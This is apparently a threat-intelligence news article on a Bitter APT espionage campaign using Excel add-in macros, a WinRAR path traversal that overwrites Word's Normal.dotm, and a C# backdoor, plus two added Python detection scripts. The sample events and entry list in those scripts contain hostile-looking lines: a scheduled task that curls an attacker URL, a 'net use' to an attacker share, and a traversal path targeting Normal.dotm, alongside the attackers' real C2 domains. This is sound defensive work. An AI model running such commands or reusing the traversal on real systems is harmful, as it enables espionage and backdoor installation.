China-based cybersecurity firm Qianxin Threat Intelligence Center has uncovered a new wave of attacks linked to the Bitter APT group (APT-Q-37), also known as 蔓灵花. The group—widely believed to have a South Asian background—has been conducting targeted cyber-espionage operations against government, military, and electric power entities in China, Pakistan, and other nations, deploying a newly developed C# backdoor through multi-stage infection chains exploiting Microsoft Office macros and a WinRAR path traversal vulnerability.
The researchers identified two distinct intrusion methods:
- Macro-based delivery through malicious .xlam files that compile and install a C# backdoor directly on the victim’s system.
- WinRAR exploitation that replaces Microsoft Word’s default Normal.dotm template with a malicious macro, automatically executing the backdoor during document opening.
Both chains culminate in the deployment of a C# implant capable of retrieving and executing arbitrary payloads from attacker-controlled servers.
The first infection vector originates from a weaponized Excel Add-In file named “Nominated Officials for the Conference.xlam”, which presents itself as a legitimate conference document.
“The file opens with a prompt to enable macros, and after the macros are enabled, a message box pops up, meaning ‘File parsing failed, content corrupted.’ This is just a way for the attacker to confuse the victim.”
Behind the ruse, the macro decodes Base64-encoded C# source code, saves it as C:\programdata\cayote.log, and compiles it into a dynamic library (vlcplayer.dll) using Microsoft’s csc.exe compiler — effectively transforming the victim’s own .NET framework into a malware factory.
Qianxin notes: “The periperi function in the macro code is used to implement persistence by writing the kefe.bat file in the Startup directory, which creates a scheduled task that makes a request to ‘hxxps://www.keeferbeautytrends.com/d6Z2.php?rz=’.”
This persistence mechanism and C2 infrastructure align closely with known Bitter APT operations observed in previous campaigns.
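The first chain leaves process-creation artifacts a defender can key on: an Office process spawning the .NET compiler, a batch file launched from the Startup folder, and a scheduled task whose action carries a URL. The script below is an added detection example, not Qianxin's code; it runs over constructed records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). The csc.exe and schtasks command lines are assumed reconstructions, and the hostnames used are the indicators named in the article.

```python
"""Rule-based detection for the macro-to-csc.exe chain described above (added example)."""
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
NET = {"net.exe", "net1.exe"}
# A .bat/.cmd inside the per-user Startup folder (matched on a lower-cased command line).
STARTUP_SCRIPT = re.compile(r"\\start menu\\programs\\startup\\[^\"\s]+\.(?:bat|cmd)\b")

# Constructed sample events; exact command-line syntax of the real tooling is assumed.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /target:library /out:C:\programdata\vlcplayer.dll C:\programdata\cayote.log"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kefe.bat"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 15 /tn Updater /tr "curl https://www.keeferbeautytrends.com/d6Z2.php?rz="'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\koliwooclients.com\templates"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12345"},  # benign print-spooler helper, should not match
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def match_rules(ev: dict) -> list:
    """Return the names of every rule the event trips, in fixed order."""
    parent, image = _base(ev.get("ParentImage", "")), _base(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    hits = []
    # Office documents have no business compiling code on the fly.
    if parent in OFFICE and image in COMPILERS:
        hits.append("office_spawns_dotnet_compiler")
    # A script dropped into the Startup folder is the persistence step quoted above.
    if STARTUP_SCRIPT.search(cmd):
        hits.append("startup_folder_script")
    # Word mapping a remote share via `net use` is the template-chain tell.
    if parent in OFFICE and image in NET and " use " in cmd and "\\\\" in cmd:
        hits.append("office_net_use_unc_share")
    # A scheduled task whose action embeds a URL is a common beaconing setup.
    if image == "schtasks.exe" and "/create" in cmd and "http" in cmd:
        hits.append("schtasks_with_url")
    return hits


def scan(events: list) -> list:
    """(event index, rule name) pairs for a batch of events."""
    return [(i, r) for i, ev in enumerate(events) for r in match_rules(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule is deliberately narrow (parent plus child plus one command-line token) so it can be translated into a SIEM query or a Sigma rule without tuning; the benign spooler event shows that Office spawning a child process alone is not enough to alert on.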
The second attack chain uses a malicious RAR archive (Provision of Information for Sectoral for AJK.rar) to exploit an unpatched WinRAR vulnerability affecting versions below 7.12.
The archive was initially suspected of leveraging CVE-2025-8088, but Qianxin’s testing revealed that the attackers were exploiting an earlier, undocumented path traversal bug that allows files to be overwritten during extraction.
“The malicious RAR tries to overwrite the Normal.dotm file of the current user’s original template library… after unzipping.”
When the victim opens the accompanying decoy Document.docx, Word automatically loads the infected Normal.dotm, executing its macro to connect to a remote shared folder and launch the winnsc.exe backdoor.
“The macro code in the malicious Normal.dotm connects to the remote shared folder ‘\\koliwooclients.com\templates’ via net use and then executes winnsc.exe from it.”
This technique cleverly abuses legitimate Office behavior, requiring no direct user interaction beyond opening a decoy file.
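Two checks follow from the second chain: before extraction, an archive entry name that climbs out of the target folder (or names an absolute path) should be refused, and after the fact, a Normal.dotm that suddenly contains a VBA project is a strong sign the template was replaced, since a stock Normal.dotm carries none. The code below is an added example, not Qianxin's or WinRAR's; it works on stored entry names rather than parsing RAR headers, and the entry names and the in-memory OOXML templates are constructed for the demonstration.

```python
"""Archive entry audit and Normal.dotm macro check for the WinRAR chain above (added example)."""
import io
import ntpath
import posixpath
import zipfile

# Tail of the per-user template path, compared case-insensitively with forward slashes.
WORD_TEMPLATE = "microsoft/templates/normal.dotm"

# Constructed entry names; the second mimics the traversal shape described in the article.
SAMPLE_ENTRIES = [
    "Document.docx",
    r"..\..\AppData\Roaming\Microsoft\Templates\Normal.dotm",
    r"C:\Users\Public\x.exe",
    "images/../logo.png",  # contains '..' but still resolves inside the archive root
]


def escapes_extraction_dir(entry: str) -> bool:
    """True if the stored name would resolve outside the extraction directory."""
    name = entry.replace("\\", "/")
    # Drive letters ("C:") and absolute or UNC paths ("/x", "//host/share") never belong in an archive.
    if ntpath.splitdrive(entry)[0] or posixpath.isabs(name):
        return True
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")


def audit_entries(entries: list) -> list:
    """Return (entry, reason) for every entry that should block extraction."""
    findings = []
    for entry in entries:
        if not escapes_extraction_dir(entry):
            continue
        reason = "escapes extraction directory"
        norm = posixpath.normpath(entry.replace("\\", "/")).lower()
        if norm.endswith(WORD_TEMPLATE):
            reason += "; targets Word Normal.dotm"
        findings.append((entry, reason))
    return findings


def template_has_vba(data: bytes) -> bool:
    """An OOXML template is a zip; a VBA project is stored as word/vbaProject.bin."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(n.lower() == "word/vbaproject.bin" for n in z.namelist())


def build_template(with_vba: bool) -> bytes:
    """Constructed minimal .dotm-shaped zip, with or without a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # placeholder bytes only
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in audit_entries(SAMPLE_ENTRIES):
        print(f"BLOCK {entry!r}: {reason}")
    print("macro-bearing template:", template_has_vba(build_template(True)))
    print("clean template:", template_has_vba(build_template(False)))
```

On a real endpoint the second function would be pointed at %APPDATA%\Microsoft\Templates\Normal.dotm, and a positive result on a host whose users do not author macros is worth an immediate look; the first function only covers traversal expressed in the entry name itself, which is what the article describes, not every extraction bug a given archiver may have.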
At the heart of both attack chains lies a C# backdoor, built to blend into normal system activity.
Qianxin’s analysts explain: “The main function of the backdoor is in an infinite loop, which first collects some device information… and then sends it in a POST request to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.”
The backdoor’s functionality includes:
- Gathering system details (OS version, hostname, temporary directory paths).
- Downloading secondary payloads based on C2 instructions.
- Validating and executing EXE files after restoring their DOS headers.
- Reporting success or failure to a separate endpoint (drxcvg45.php).
All communications occur over HTTPS to attacker-controlled subdomains of esanojinjasvc.com, a domain registered in April 2025, strongly linked to Bitter’s infrastructure.
The campaign’s command-and-control patterns and script syntax confirm Qianxin’s attribution to the Bitter APT group.
“The kefe.bat script generated when the macro code of the xlam file builds persistence appears in the Bitter-related domain name www.keeferbeautytrends.com, and the script commands are in the same format as those commonly used by Bitter.”
Furthermore, koliwooclients.com, one of the remote servers used for payload delivery, was previously exposed in the Craneflower espionage campaign — hinting at possible code or infrastructure sharing among regional APTs.